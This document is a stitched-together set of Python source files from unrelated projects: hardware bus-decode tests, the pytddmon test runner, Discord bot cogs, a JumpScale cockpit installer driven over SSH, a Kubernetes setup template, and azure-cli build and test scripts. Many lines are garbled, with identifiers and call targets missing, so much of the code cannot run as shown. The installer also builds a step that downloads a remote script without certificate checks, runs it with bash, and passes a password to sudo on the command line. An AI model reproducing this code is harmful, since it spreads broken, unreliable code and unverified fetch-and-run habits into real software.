2.8, 2.8 ] x=BusDecode() x.f_SetThresholdType('LVTTL') dataout = x.f_Threshold(datain) dataref = [0, 0, 0, 2, 2, 2, 2, 2, 2, 2, 1, 1, 1, 1, 1 ] self.assertEqual(dataref, dataout) # Test Clock Frequency determination def test_FindClockFreq(self): datain = [0.2, 2.4, 0.2, 2.4, 0.2, 1.5, 2.4, 2.4, 1.5, 0.2, 0.2, 1.7, 2.4, 1.2, 0.2, 2.4, 0.2, 2.4, 0.2] x=BusDecode() x.f_SetThresholdType('LVTTL') dataout = x.f_Threshold(datain) x.f_FindClkDuration(dataout) self.assertEqual(2, x.PulseDurationLo) self.assertEqual(2, x.PulseDurationHi) # Test Digital Word Determination def test_FindEdges(self): datain = [0.2, 2.4, 0.2, 2.4, 0.2, 1.5, 2.4, 2.4, 1.5, 0.2, 0.2, 1.7, 2.4, 1.2, 0.2, 2.4, 0.2, 2.4, 0.2] x=BusDecode() x.f_SetThresholdType('LVTTL') x.f_SetEdgeTimeSamples(0) dataout = x.f_Threshold(datain) digital = x.f_FindEdges(dataout) digitalref = [0, 1, -1, 1, -1, 0, 1, 0, 0, -1, 0, 0, 1, 0, -1, 1,-1, 1, -1 ] self.assertEqual(digitalref, digital) ``` #### File: 0caliber/tds3012b/ ```python import os import sys import tempfile import atexit import shlex import platform import optparse import re from time import gmtime, strftime from subprocess import Popen, PIPE, STDOUT ON_PYTHON3 = sys.version_info[0] == 3 ON_WINDOWS = platform.system() == "Windows" if not ON_PYTHON3: import Tkinter as tk else: import tkinter as tk # Constants TEMP_FILE_DIR_NAME = tempfile.mkdtemp() RUN_TESTS_SCRIPT_FILE = os.path.join(TEMP_FILE_DIR_NAME, '') TEMP_OUT_FILE_NAME = os.path.join(TEMP_FILE_DIR_NAME, "out") # If pytddmon is run in test mode, it will: # 1. display the GUI for a very short time # 2. write a log file, containing the information displayed # (most notably green/total) # 3. exit TEST_MODE_FLAG = '--log-and-exit' TEST_MODE_LOG_FILE = 'pytddmon.log' TEST_FILE_REGEXP = "test_.*\\.py" PYTHON_FILE_REGEXP = ".*\\.py" def re_complete_match(regexp, string_to_match): """Helper function that does a regexp check if the full string_to_match matches the regexp""" return bool(re.match(regexp+"$", string_to_match)) # End of Constants def file_name_to_module(base_path, file_name): r"""Converts filenames of files in packages to import friendly dot separated paths. Examples: >>> print(file_name_to_module("","pytddmon.pyw")) pytddmon >>> print(file_name_to_module("","")) pytddmon >>> print(file_name_to_module("","tests/")) tests.pytddmon >>> print(file_name_to_module("","./tests/")) tests.pytddmon >>> print(file_name_to_module("",".\\tests\\")) tests.pytddmon >>> print(file_name_to_module("/User/pytddmon\\ geek/pytddmon/","/User/pytddmon\\ geek/pytddmon/tests/")) tests.pytddmon """ symbol_stripped = os.path.relpath(file_name, base_path) for symbol in r"/\.": symbol_stripped = symbol_stripped.replace(symbol, " ") words = symbol_stripped.split() module_words = words[:-1] # remove .py/.pyw module_name = '.'.join(module_words) return module_name def build_run_script(files): """Compiles a script to run all tests in the files. >>> print(build_run_script([""])) import sys import unittest import doctest ... import pytddmon suite.addTests(load_module_tests(pytddmon)) try: suite.addTests(doctest.DocTestSuite(pytddmon, optionflags=doctest.ELLIPSIS)) except:pass ... """ content = [] content.append("import sys") content.append("import unittest") content.append("import doctest") content.append("") content.append("sys.path[0] = %r" % os.getcwd()) content.append("suite = unittest.TestSuite()") content.append( "load_module_tests = unittest.defaultTestLoader.loadTestsFromModule" ) content.append("") for filename in files: module = file_name_to_module("", filename) content.append('import ' + module) content.append('suite.addTests(load_module_tests(' + module + '))') content.append('try:') content.append( ' suite.addTests(doctest.DocTestSuite(' + module + ', optionflags=doctest.ELLIPSIS))' ) content.append('except:pass') content.append('') content.append("if __name__ == '__main__':") content.append(" out = open(%r, 'w')" % TEMP_OUT_FILE_NAME) content.append(" unittest.TextTestRunner(stream=out).run(suite)") return "\n".join(content) def calculate_checksum(filelist, fileinfo): """Generates a checksum for all the files in the file list.""" val = 0 for filename in filelist: val += ( fileinfo.get_modified_time(filename) + fileinfo.get_size(filename) + fileinfo.get_name_hash(filename) ) return val class ColorPicker: """ ColorPicker decides the background color the pytddmon window, based on the number of green tests, and the total number of tests. Also, there is a "pulse" (light color, dark color), to increase the feeling of continous testing. """ def __init__(self): self.color = 'green' self.light = True def pick(self): "returns the tuple (light, color) with the types(bool ,str)" return (self.light, self.color) def pulse(self): "updates the light state" self.light = not self.light def reset_pulse(self): "resets the light state" self.light = True def set_result(self, green, total): "calculates what color should be used and may reset the lightness" old_color = self.color self.color = 'green' if green == total-1: self.color = 'red' if green < total-1: self.color = 'gray' if self.color != old_color: self.reset_pulse() def win_text(total_tests, passing_tests=0): """ The text shown in the main window. """ return "%d/%d" % (passing_tests, total_tests) class ScriptWriter: """ ScriptWriter: gets it's modules from the Finder, and writes a test script using the file writer and script builder. """ def __init__(self, finder, file_writer, script_builder): self.finder = finder self.file_writer = file_writer self.script_builder = script_builder def write_script(self): """ Finds the tests and Compiles the test runner script and writes it to file. This is done with the help from the finder script builder and file writer. """ modules = self.finder() result = self.script_builder(modules) self.file_writer(RUN_TESTS_SCRIPT_FILE, result) class TestScriptRunner: """ TestScriptRunner has two collaborators: cmdrunner, runs a specified command line, returns stderr as string analyzer, analyses unittest-output into green,total number of tests """ def __init__(self, cmdrunner, analyzer): self.cmdrunner = cmdrunner self.analyzer = analyzer def run(self, test_script): """ Runns the test runner script and returns the analysed output. """ output = self.cmdrunner('python "%s"' % test_script) return self.analyzer.analyze(output) class Analyzer: """ Analyzer Analyzes unittest output to find green and total number of tests. Collaborators: logger, log messages a written to the log """ def __init__(self, logger): self.logger = logger def analyze(self, txt): """ Analyses the out put from a unittest and returns a tupple of (passed/green, total) """ if len(txt.strip()) == 0: return (0, 0) toprow = txt.splitlines()[0] green = toprow.count('.') total = len(toprow) if green < total: self.logger.log(txt) return (green, total) class Logger: """ Logger, remembers log messages. """ def __init__(self): self.complete_log = "" def log(self, message): """ Adds message to the log """ self.complete_log = self.complete_log + message def get_log(self): """ returns the log as a string """ return self.complete_log def clear(self): """ clears all entries in the log """ self.complete_log = "" ## Rows above this are unit-tested. ## Rows below this are not unit-tested. def remove_tmp_files(): """ Clean up all tempfiles after us. """ safe_remove(RUN_TESTS_SCRIPT_FILE) if os.path.exists(TEMP_FILE_DIR_NAME): os.removedirs(TEMP_FILE_DIR_NAME) atexit.register(remove_tmp_files) class RealFileInfo(object): """ A adapter to easy finde info of a file. """ @staticmethod def get_size(filename): "returns the size of a file" return os.stat(filename).st_size @staticmethod def get_modified_time(filename): "returns the time the file was last modified" return os.stat(filename).st_mtime @staticmethod def get_name_hash(path): """ returns a hash of the name of the path """ return hash(path) def find_monitored_files(): " Finds all python modules in current directory and subdirectories " monitored_files = [] for path, _folders, files in os.walk("."): for filename in files: if re_complete_match(PYTHON_FILE_REGEXP, filename): monitored_file = os.path.join(path, filename) monitored_files.append(monitored_file) return monitored_files def find_test_files_recursively(): """ Scan recursively for unit test files in current folder and in folders which are packages. Packages are assumed to contain the word 'test'. The same holds true for unit test files, with the additional condition that they are assumed to end with '.py'. """ test_files = [] for path, folders, files in os.walk("."): for filename in files: if re_complete_match(TEST_FILE_REGEXP, filename): test_file = os.path.join(path, filename) test_files.append(test_file) folders[:] = [ folder for folder in folders if os.path.isfile( os.path.join(path, folder, "") ) ] return test_files def finder_with_fixed_fileset(fileset): """ Module finder which always returns the same file list. """ def find(): "returns the sent-in file set" return fileset return find def safe_remove(path): "removes path and ignores all exceptions." try: os.unlink(path) except OSError: pass def run_cmdline(cmdline): "runs a cmd and returns its output" lst = shlex.split(cmdline) use_shell = True if ON_WINDOWS else False cmd = Popen(lst, stdout=PIPE, stderr=STDOUT, shell=use_shell) output = cmd.communicate()[0] if os.path.exists(TEMP_OUT_FILE_NAME): output = open(TEMP_OUT_FILE_NAME).read() os.remove(TEMP_OUT_FILE_NAME) return output def write_file(filename, content): """ Writes a string of text to a file, overwriting any previous file with the same name. """ f_hand = open(filename, 'w') f_hand.write(content) f_hand.close() def message_window(message): "creates and shows a window with the message" win = tk.Toplevel() win.wm_attributes("-topmost", 1) if ON_WINDOWS: win.attributes("-toolwindow", 1) win.title('Details') message = message.replace('\r\n', '\n') text = tk.Text(win) text.insert(tk.INSERT, message) text['state'] = tk.DISABLED text.pack(expand=1, fill='both') text.focus_set() class PytddmonFrame(tk.Frame): "The Main GUI of pytddmon" def __init__(self, root=None, files=None, test_mode=False): tk.Frame.__init__(self, root) self.button = None self.test_mode = test_mode self.master.title("pytddmon") self.master.resizable(0, 0) self.create_button() self.grid() self.failures = 0 self.last_checksum = None # important to be different from any number self.num_tests = 0 self.num_tests_prev = 0 self.num_tests_diff = 0 self.logger = Logger() self.color_picker = ColorPicker() self.runner = TestScriptRunner(run_cmdline, Analyzer(self.logger)) self.monitoring = os.getcwd() finder = None if files != None: self.monitoring = ' '.join(files) finder = finder_with_fixed_fileset(files) else: finder = find_test_files_recursively self.script_writer = ScriptWriter( finder, write_file, build_run_script ) self.color_table = { (True, 'green'): '0f0', (False, 'green'): '0c0', (True, 'red'): 'f00', (False, 'red'): 'c00', (True, 'gray'): '999', (False, 'gray'): '555' } self.look_for_changes() @staticmethod def compute_checksum(): "returns the checksum for all the sourcefiles as a single integer." files = find_monitored_files() try: files.remove(RUN_TESTS_SCRIPT_FILE) except ValueError: pass return calculate_checksum(files, RealFileInfo()) def get_number_of_failures(self): """Returns the number of faild tests""" self.script_writer.write_script() (green, total) = self.num_tests_prev = self.num_tests self.num_tests = total return total - green @staticmethod def clock_string(): "Formating the time for better readability" return strftime("%H:%M:%S", gmtime()) def create_button(self): "Initialize the Button label." button_width = 8 if not ON_WINDOWS: # Hack: Window title cut if button too small! button_width = 10 self.button = tk.Label(self, text='pytddmon', width=button_width, relief='raised', font=("Helvetica", 16), justify=tk.CENTER, anchor=tk.CENTER) self.button.bind("<Button-1>", self.button_clicked) self.button.pack(expand=1, fill='both') def button_clicked(self, _widget): "Event method triggerd if the button is clicked." msg = "Monitoring: %s\n%s" % (self.monitoring, self.logger.get_log()) message_window(msg) def get_green_and_total(self): """ Calculate the green results and returns that together with the total of tests as a tuple. """ return (self.num_tests-self.failures, self.num_tests) def update_gui(self): "Calls all update methods related to the gui" (green, total) = self.get_green_and_total() self.update_gui_color(green, total) self.update_gui_text(green, total) def update_gui_color(self, green, total): """ Calculates the new background color and tells the GUI to switch to it. """ self.color_picker.set_result( green, total ) (light, color) = self.color_picker.pick() self.color_picker.pulse() rgb = '#' + self.color_table[(light, color)] self.button.configure(bg=rgb, activebackground=rgb) self.configure(background=rgb) def update_gui_text(self, green, total): "Updates the text of the Main GUI." txt = win_text( passing_tests=green, total_tests=total ) self.button.configure(text=txt) def look_for_changes(self): "Look for changes in source files and runs tests if needed." newval = self.compute_checksum() if newval != self.last_checksum: self.last_checksum = newval self.logger.clear() self.logger.log('[%s] Running all tests...\n' % self.clock_string()) self.failures = self.get_number_of_failures() self.logger.log( '[%s] Number of failures: %d\n' % ( self.clock_string(), self.failures ) ) self.update_gui() if self.test_mode: file_h = open(TEST_MODE_LOG_FILE, "w") (green, total) = self.get_green_and_total() lines = [ 'green='+str(green), 'total='+str(total) ] file_h.write('\n'.join(lines)) file_h.close() self.master.destroy() else: self.after(750, self.look_for_changes) def filter_existing_files(files): "simple filtering function checking for existence of files" return [f for f in files if os.path.exists(f)] def parse_commandline(): """ returns (files, test_mode) created from the command line arguments passed to pytddmon. """ parser = optparse.OptionParser() parser.add_option("--log-and-exit", action="store_true", default=False) (options, args) = parser.parse_args() return (args, options.log_and_exit) def run(): """ The main function: basic initialization and program start """ # Command line argument handling (static_file_set, test_mode) = parse_commandline() static_file_set = filter_existing_files(static_file_set) # Basic tkinter initialization root = tk.Tk() root.wm_attributes("-topmost", 1) if ON_WINDOWS: root.attributes("-toolwindow", 1) if not test_mode: print("Minimize me!") # Create main window if len(static_file_set)>0: PytddmonFrame(root, static_file_set, test_mode=test_mode) else: PytddmonFrame(root, test_mode=test_mode) # Main loop try: root.mainloop() except Exception as exception: print(exception) if __name__ == '__main__': run() ```
{ "source": "0ceanlight/mcbeDiscordBot", "score": 3 }
#### File: mcbeDiscordBot/cogs/ ```python import discord from discord.ext import commands class Logs(commands.Cog): def __init__(self, bot): = bot @commands.Cog.listener() async def on_message_delete(self, message): if in return if != 574267523869179904: return if == 0: color = 16777210 else: color = channel = int([str(]["logs_channel"]) ) embed = discord.Embed( title="**Deleted Message**", color=color, timestamp=message.created_at ) embed.add_field(name="**User**",, inline=True) embed.add_field(name="**Channel**",, inline=True) embed.add_field(name="**Message**", value=message.content, inline=False) await channel.send(embed=embed) @commands.Cog.listener() async def on_message_edit(self, before, after): if before.content == after.content: return if != 574267523869179904: return channel = int([str(]["logs_channel"]) ) if == 0: color = 16777210 else: color = embed = discord.Embed( title="**Edited Message**", color=color, timestamp=after.edited_at ) embed.add_field(name="**User**",, inline=True) embed.add_field(name="**Channel**",, inline=True) embed.add_field(name="**Original Message**", value=before.content, inline=False) embed.add_field(name="**New Message**", value=after.content, inline=False) await channel.send(embed=embed) def setup(bot): bot.add_cog(Logs(bot)) ``` #### File: mcbeDiscordBot/cogs/ ```python import json import discord import requests import tweepy from discord.ext import commands, tasks class StreamListener(tweepy.StreamListener): def __init__(self): with open("./config.json") as f: self.config = json.load(f) def on_error(self, status_code: int) -> bool: if status_code == 420: print("Rate limit reached. ") # returning False in on_error disconnects the stream return False def on_data(self, data): data = json.loads(data) try: tweetUser = data["tweet"]["user"]["screen_name"] tweetID = data["tweet"]["id_str"] except: tweetUser = data["user"]["screen_name"] tweetID = data["id_str"] tweetLink = f"{tweetUser}/status/{tweetID}" body = {"content": tweetLink} global config r = self.config["574267523869179904"]["tweetWebhook"], headers={"Content-Type": "application/json"}, data=json.dumps(body), ) # config['574267523869179904']['tweetWebhook'], data=json.dumps(body)) print(r.status_code) print(r.text) # print(json.dumps(data, indent='\t')) class Twitter(commands.Cog): def __init__(self, bot): = bot auth = tweepy.OAuthHandler(["twitter"]["consumer_key"],["twitter"]["consumer_secret"], ) auth.set_access_token(["twitter"]["access_token"],["twitter"]["access_token_secret"], ) api = tweepy.API(auth) myStreamListener = StreamListener() stream = tweepy.Stream(auth=api.auth, listener=myStreamListener) stream.filter(follow=["1287799985040437254"], is_async=True) def setup(bot): bot.add_cog(Twitter(bot)) ```
{ "source": "0-coding/python_examples", "score": 3 }
#### File: python_examples/source/ ```python import unittest class WidgetTestCase(unittest.TestCase): def test_default_widget_size(self): self.assertEqual((50,50), (50,50), 'incorrect default size') def test_widget_resize(self): self.assertEqual((100,150), (100,150), 'wrong size after resize') def suite(): suite = unittest.TestSuite() suite.addTest(WidgetTestCase('test_default_widget_size')) suite.addTest(WidgetTestCase('test_widget_resize')) return suite if __name__ == '__main__': from io import StringIO stream = StringIO() runner = unittest.TextTestRunner(stream=stream, verbosity=2) print('Test output\n' + ```
{ "source": "0-complexity/ays_automatic_cockpit_based_testing", "score": 2 }
#### File: Framework/Installer/ ```python from cockpit_testing.Framework.utils.utils import BaseTest import paramiko, requests, time, subprocess, os, re class ExecuteRemoteCommands: def __init__(self, ip, port, username, password): self.ip = ip self.port = port self.username = username self.password = password self.baseTest = BaseTest() self.ssh = paramiko.SSHClient() self.ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) self.connect_to_virtual_machine() self.sftp = self.ssh.open_sftp() script_dir = os.path.dirname(__file__) self.portal_config_source = os.path.join(script_dir, '../../production_config/portal_config_source.hrd') self.api_config_source = os.path.join(script_dir, '../../production_config/api_config_source.toml') self.api_config = os.path.join(script_dir, '../../production_config/api_config.toml') self.portal_config = os.path.join(script_dir, '../../production_config/portal_config.hrd') def connect_to_virtual_machine(self):' [*] Connecting to the virtual machine .. ') print(' [*] Connecting to the virtual machine .. ') for _ in range(300): try: self.ssh.connect(self.ip, port=self.port, username=self.username, password=self.password) break except: time.sleep(2)' [*] Trying to connect to the virtual machine .. ') else: self.ssh.connect(self.ip, port=self.port, username=self.username, password=self.password) def update_machine(self):' [*] Updating virtual machine OS ... ') print(' [*] Updating virtual machine OS ... ') command = 'echo %s | sudo -S apt-get update' % self.password self.execute_command(command=command) def install_js(self, branch):' [*] Creating jsInstaller file .... ') print(' [*] Creating jsInstaller file .... ') command = """echo 'cd $TMPDIR;\nexport JSBRANCH=%s;\ncurl -k$JSBRANCH/install/$RANDOM >;\nbash;' >""" % branch self.execute_command(command=command)' [*] Executing jsInstaller from %s branch .... ' % branch) print(' [*] Executing jsInstaller .... ') command = 'echo %s | sudo -S bash' % self.password result = self.execute_command(command=command) if len(result) == 0: self.baseTest.logging.error(' [*] FAIL : fail in executing jsInstaller file .... ') print(' [*] FAIL : fail in executing jsInstaller file .... ') # raise NameError(' [*] FAIL : fail in executing jsInstaller file .... ') def install_cockpit(self, branch):' [*] Creating file ... ') print(' [*] Creating file ... ') if branch == '8.1.0' or branch == '8.1.1': command = """echo 'from JumpScale import j\ncuisine =\, branch="%s", reset=True, ip="%s")' >""" % ( branch, self.ip) else: command = """echo 'from JumpScale import j\ncuisine =\ncuisine.apps.portal.install()' >""" self.execute_command(command=command)' [*] Executing cockpitInstaller from %s brnach ... ' % branch) print(' [*] Executing file ... ') command = 'echo %s | sudo -S jspython' % self.password result = self.execute_command(command=command) if len(result) == 0: self.baseTest.logging.error(' [*] FAIL : fail in executing cockpitInstaller file .... ') print((' [*] FAIL : fail in executing cockpitInstaller file .... ')) elif branch != '8.1.0' and branch != '8.1.1': command = 'echo %s | sudo -S ays start' % self.password result = self.execute_command(command=command) if len(result) == 0: self.baseTest.logging.error(' [*] FAIL : fail in running "ays start" .... ') print((' [*] FAIL :fail in running "ays start" .... ')) def execute_command(self, command): try: stdin, stdout, stderr = self.ssh.exec_command(command) tracback = stdout.readlines() return tracback except: self.baseTest.logging.error(" [*] ERROR : Can't execute %s command" % command) def check_cockpit_portal(self, cockpit_ip): url = 'http://' + cockpit_ip for _ in range(5): try: response = requests.get(url=url) except: time.sleep(5) continue else: if response.status_code == 200:' [*] You can access the new cockpit on : http:%s ' % self.ip) print((' [*] You can access the new cockpit on : http://%s ' % self.ip)) return True else: time.sleep(5) continue else: print(' [*] [X] FAIL : Please, Check installtion files in %s vm ' % cockpit_ip) self.baseTest.logging.error(' [*] FAIL : Please, Check installtion files in %s vm ' % cockpit_ip) return False def check_branchs_values(self, branch):' [*] Getting branches versions ... ') print(' [*] Getting branches versions ... ') dir = ['ays_jumpscale8', 'jscockpit', 'jumpscale_core8', 'jumpscale_portal8'] for item in dir: command = 'cd /opt/code/github/jumpscale/%s && git branch' % item result = self.execute_command(command=command) if len(result) == 0: self.baseTest.logging.error(' [*] FAIL : fail in getting %s branch .... ' % item) print(' [*] FAIL : fail in getting %s branch version .... ' % item) elif branch not in result[0]: self.baseTest.logging.error( ' [*] ERROR : %s branch is not matching with %s:%s branch' % (branch, item, result)) print(' [*] ERROR : %s branch is not matching with %s:%s branch' % (branch, item, result)) else: self.baseTest.logging.error( ' [*] OK : %s branch is matching with %s:%s branch' % (branch, item, result)) print(' [*] OK : %s branch is matching with %s:%s branch' % (branch, item, result)) def trasport_file(self, filepath): file_name = filepath.split('/')[-1] self.sftp.put(filepath, file_name) def generat_production_config_files(self): client_id = self.baseTest.values['client_id'] client_secret = self.baseTest.values['client_secret'] open("tmp", "w").writelines([l for l in open(self.portal_config_source).readlines()]) with open(self.portal_config, 'w') as portal: with open('tmp') as tmp: for line in tmp: if 'param.cfg.production' in line: portal.write('param.cfg.production = true\n') elif 'param.cfg.client_scope' in line: portal.write("param.cfg.client_scope = 'user:email:main,user:memberof:%s'\n" % client_id) elif 'param.cfg.force_oauth_instance' in line: portal.write("param.cfg.force_oauth_instance = ''\n") elif 'param.cfg.client_id' in line: portal.write("param.cfg.client_id = '%s'\n" % client_id) elif 'param.cfg.client_secret' in line: portal.write("param.cfg.client_secret = '%s'\n" % client_secret) elif 'param.cfg.redirect_url' in line: portal.write( "param.cfg.redirect_url = 'http://%s/restmachine/system/oauth/authorize'\n" % self.ip) elif 'param.cfg.client_user_info_url' in line: portal.write("param.cfg.client_user_info_url = ''\n") elif 'param.cfg.token_url' in line: portal.write("param.cfg.token_url = ''\n") elif 'param.cfg.organization =' in line: portal.write("param.cfg.organization = '%s'\n" % client_id) elif 'param.cfg.oauth.default_groups' in line: portal.write("param.cfg.oauth.default_groups = 'admin', 'user',\n") else: portal.write(line) portal.close() open("tmp", "w").writelines([l for l in open(self.api_config_source).readlines()]) with open(self.api_config, 'w') as api: with open('tmp') as tmp: for line in tmp: if 'prod = false' in line: api.write('prod = true\n') elif 'organization = ' in line: api.write('organization = "%s" \n' % client_id) elif 'redirect_uri = ' in line: api.write('redirect_uri = "http://%s/api/oauth/callback"\n' % self.ip) elif 'client_secret =' in line: api.write('client_secret = "%s"\n' % client_secret) elif 'client_id = ' in line: api.write('client_id = "%s" \n' % client_id) elif 'jwt' in line: api.write( 'jwt_key = "-----<KEY>"') else: api.write(line) api.close() def move_produciton_file(self):' [*] Moving production config files .... ') print(' [*] Moving production config files .... ') command = 'echo %s | sudo -S mv -f /home/cloudscalers/api_config.toml /optvar/cfg/cockpit_api/config.toml' % self.password self.execute_command(command=command) command = 'echo %s | sudo -S mv -f /home/cloudscalers/portal_config.hrd /optvar/cfg/portals/main/config.hrd' % self.password self.execute_command(command=command) def restart_cockpit_services(self):' [*] Restarting cockpit services .... ') print(' [*] Restarting cockpit services .... ') command = 'echo %s | sudo -S service portal restart && sudo -S service cockpit_main restart && sudo -S service cockpit_daemon_main restart' % self.password self.execute_command(command=command) def remove_tmp_files(self):'rm %s' % self.api_config, shell=True)'rm %s' % self.portal_config, shell=True) script_dir = os.path.dirname(__file__)'rm %s' % os.path.join(script_dir, '../../../tmp'), shell=True) def production_mode(self): self.generat_production_config_files() self.trasport_file(self.portal_config) self.trasport_file(self.api_config) self.move_produciton_file() self.restart_cockpit_services() self.remove_tmp_files() print( ' [*] Please, Update the callback url of ITSYOUONLINE to be http://%s/restmachine/system/oauth/authorize' % self.ip) ```
{ "source": "0-complexity/kubernetes", "score": 2 }
#### File: templates/setup/ ```python from js9 import j from zerorobot.template.base import TemplateBase from zerorobot.template.state import StateCheckError class Setup(TemplateBase): version = '0.0.1' template_name = "setup" SSHKEY_TEMPLATE = '' OVC_TEMPLATE = '' ACCOUNT_TEMPLATE = '' VDC_TEMPLATE = '' NODE_TEMPLATE = '' ZROBOT_TEMPLATE = '' K8S_TEMPLATE = '' def __init__(self, name, guid=None, data=None): super().__init__(name=name, guid=guid, data=data) self._config = None def validate(self): for key in ['vdc', 'workers', 'sshKey']: value =[key] if not value: raise ValueError('"%s" is required' % key) @property def config(self): ''' returns an object with names of vdc, account, and ovc ''' if self._config is not None: return self._config config = { 'vdc':['vdc'], } # traverse the tree up words so we have all info we need to return, connection and # account matches =, name=config['vdc']) if len(matches) != 1: raise RuntimeError('found %d vdcs with name "%s"' % (len(matches), config['vdc'])) vdc = matches[0] self._vdc = vdc task = vdc.schedule_action('get_account') task.wait() config['account'] = task.result matches =, name=config['account']) if len(matches) != 1: raise ValueError('found %s accounts with name "%s"' % (len(matches), config['account'])) account = matches[0] # get connection task = account.schedule_action('get_openvcloud') task.wait() config['ovc'] = task.result self._config = config return self._config def _find_or_create(self, zrobot, template_uid, service_name, data): found = template_uid=template_uid, name=service_name ) if len(found) != 0: return found[0] return template_uid=template_uid, service_name=service_name, data=data ) def _ensure_helper(self): name = '%s-little-helper' % node = self._find_or_create( self.api, template_uid=self.NODE_TEMPLATE, service_name=name, data={ 'vdc':['vdc'], 'sshKey':['sshKey'], 'sizeId': 2, } ) task = node.schedule_action('install') task.wait() if task.state == 'error': raise return node def _ensure_zrobot(self, helper): name = '%s-little-bot' % bot = self._find_or_create( self.api, template_uid=self.ZROBOT_TEMPLATE, service_name=name, data={ 'node':, 'port': 6600, 'templates': [ '', '', ], }, ) # update data in the disk service task = bot.schedule_action('install') task.wait() if task.state == 'error': raise return bot def _mirror_services(self, zrobot): config = self.config ovc = j.clients.openvcloud.get(config['ovc']) self._find_or_create( zrobot, template_uid=self.SSHKEY_TEMPLATE, service_name='%s-ssh' %, data={ 'passphrase': <PASSWORD>wd(20, 'ABCDEF<PASSWORD>'), } ) self._find_or_create( zrobot, template_uid=self.OVC_TEMPLATE, service_name=config['ovc'], data={ 'address':['address'], 'port':['port'], 'location':['location'], 'token':['jwt_'], } ) account = self._find_or_create( zrobot, template_uid=self.ACCOUNT_TEMPLATE, service_name=config['account'], data={ 'openvcloud': config['ovc'], 'create': False, } ) vdc = self._find_or_create( zrobot, template_uid=self.VDC_TEMPLATE, service_name=config['vdc'], data={ 'account': config['account'], 'create': False, } ) # make sure they are installed for instance in [account, vdc]: task = instance.schedule_action('install') task.wait() if task.state == 'error': raise def _deply_k8s(self, zrobot): k8s = self._find_or_create( zrobot, template_uid=self.K8S_TEMPLATE,, data={ 'workersCount':['workers'], 'sizeId':['sizeId'], 'dataDiskSize':['dataDiskSize'], 'sshKey': '%s-ssh' %, 'vdc':['vdc'] } ) task = k8s.schedule_action('install') task.wait() if task.state == 'error': raise return task.result def install(self): try: self.state.check('actions', 'install', 'ok') return except StateCheckError: pass helper = self._ensure_helper() bot = self._ensure_zrobot(helper) zrobot = self.api.robots[] self._mirror_services(zrobot)['credentials'] = self._deply_k8s(zrobot) # next step, make a deployment self.state.set('actions', 'install', 'ok') ```
{ "source": "0cool321/azure-cli", "score": 2 }
#### File: automation/release/ ```python from __future__ import print_function import argparse import os import tempfile from subprocess import check_call from .version_patcher import VersionPatcher from ..utilities.path import get_all_module_paths def build(pkg_path, dest): """ pkg_path - Full path to directory of the package to build dest - Destination for the built package """ check_call(['python', '', 'sdist', '-d', dest, 'bdist_wheel', '-d', dest], cwd=pkg_path) def release(pkg_dir, repo): """Release all packages in a directory""" pkgs = [os.path.join(pkg_dir, f) for f in os.listdir(pkg_dir)] for pkg in pkgs: check_call(['twine', 'register', '--repository-url', repo, '--repository', repo, pkg]) check_call(['twine', 'upload', '--repository-url', repo, '--repository', repo, pkg]) def run_build_release(component_name, repo, use_version_patch=True): """ component_name - The full component name (e.g. azure-cli, azure-cli-core, azure-cli-vm, etc.) """ for comp_name, comp_path in get_all_module_paths(): if comp_name == component_name: pkg_dir = tempfile.mkdtemp() patcher = VersionPatcher(use_version_patch, component_name, comp_path) patcher.patch() build(comp_path, pkg_dir) patcher.unpatch() print("Built '{}' to '{}'".format(comp_name, pkg_dir)) if repo: release(pkg_dir, repo) return raise ValueError("No component found with name '{}'".format(component_name)) if __name__ == '__main__': parser = argparse.ArgumentParser( description="Automated build and release of a component. To only build, don't specify the" " repo parameter. The environment variables TWINE_USERNAME and TWINE_PASSWORD " "are required if releasing.") parser.add_argument('--component', '-c', required=True, help='Component name (e.g. azure-cli, azure-cli-vm, etc.)') parser.add_argument('--no-version-patch', action='store_false', help="By default, we patch the version number of the package to remove " "'+dev' if it exists.") parser.add_argument('--repo', '-r', help='Repository URL for release (e.g., ' '') args = parser.parse_args() if args.repo: assert os.environ.get('TWINE_USERNAME') and os.environ.get('TWINE_PASSWORD'), \ "Set TWINE_USERNAME and TWINE_PASSWORD environment variables to authentication with " \ "PyPI repository." run_build_release(args.component, args.repo, args.no_version_patch) ``` #### File: batch/tests/ ```python import os from azure.cli.core.test_utils.vcr_test_base import (ResourceGroupVCRTestBase, JMESPathCheck, NoneCheck) def _before_record_response(response): # ignore any 401 responses during playback if response['status']['code'] == 401: response = None return response class BatchMgmtAccountScenarioTest(ResourceGroupVCRTestBase): def tear_down(self): rg = self.resource_group name = self.storage_account_name self.cmd('storage account delete -g {} -n {}'.format(rg, name)) def __init__(self, test_method): super(BatchMgmtAccountScenarioTest, self).__init__(__file__, test_method) self.resource_group = 'vcr_resource_group' self.account_name = 'clibatchtest4' self.location = 'brazilsouth' self.storage_account_name = 'clibatchteststorage2' def test_batch_account_mgmt(self): self.execute() def body(self): rg = self.resource_group name = self.account_name loc = self.location # test create storage account with default set result = self.cmd('storage account create -g {} -n {} -l {} --sku Standard_LRS'. format(rg, self.storage_account_name, loc), checks=[ JMESPathCheck('name', self.storage_account_name), JMESPathCheck('location', loc), JMESPathCheck('resourceGroup', rg) ]) sid = result['id'] # test create account with default set self.cmd('batch account create -g {} -n {} -l {}'.format(rg, name, loc), checks=[ JMESPathCheck('name', name), JMESPathCheck('location', loc), JMESPathCheck('resourceGroup', rg) ]) self.cmd('batch account set -g {} -n {} --storage-account-id {}'. format(rg, name, sid), checks=[ JMESPathCheck('name', name), JMESPathCheck('location', loc), JMESPathCheck('resourceGroup', rg) ]) self.cmd('batch account show -g {} -n {}'.format(rg, name), checks=[ JMESPathCheck('name', name), JMESPathCheck('location', loc), JMESPathCheck('resourceGroup', rg), JMESPathCheck('autoStorage.storageAccountId', sid) ]) self.cmd('batch account autostorage-keys sync -g {} -n {}'.format(rg, name)) keys = self.cmd('batch account keys list -g {} -n {}'.format(rg, name), checks=[ JMESPathCheck('primary != null', True), JMESPathCheck('secondary != null', True) ]) keys2 = self.cmd('batch account keys renew -g {} -n {} --key-name primary'. format(rg, name), checks=[ JMESPathCheck('primary != null', True), JMESPathCheck('secondary', keys['secondary']) ]) self.assertTrue(keys['primary'] != keys2['primary']) # test batch account delete self.cmd('batch account delete -g {} -n {}'.format(rg, name)) self.cmd('batch account list -g {}'.format(rg), checks=NoneCheck()) self.cmd('batch location quotas show -l {}'.format(loc), checks=[ JMESPathCheck('accountQuota', 1) ]) class BatchMgmtApplicationScenarioTest(ResourceGroupVCRTestBase): def set_up(self): super(BatchMgmtApplicationScenarioTest, self).set_up() rg = self.resource_group sname = self.storage_account_name name = self.account_name loc = self.location # test 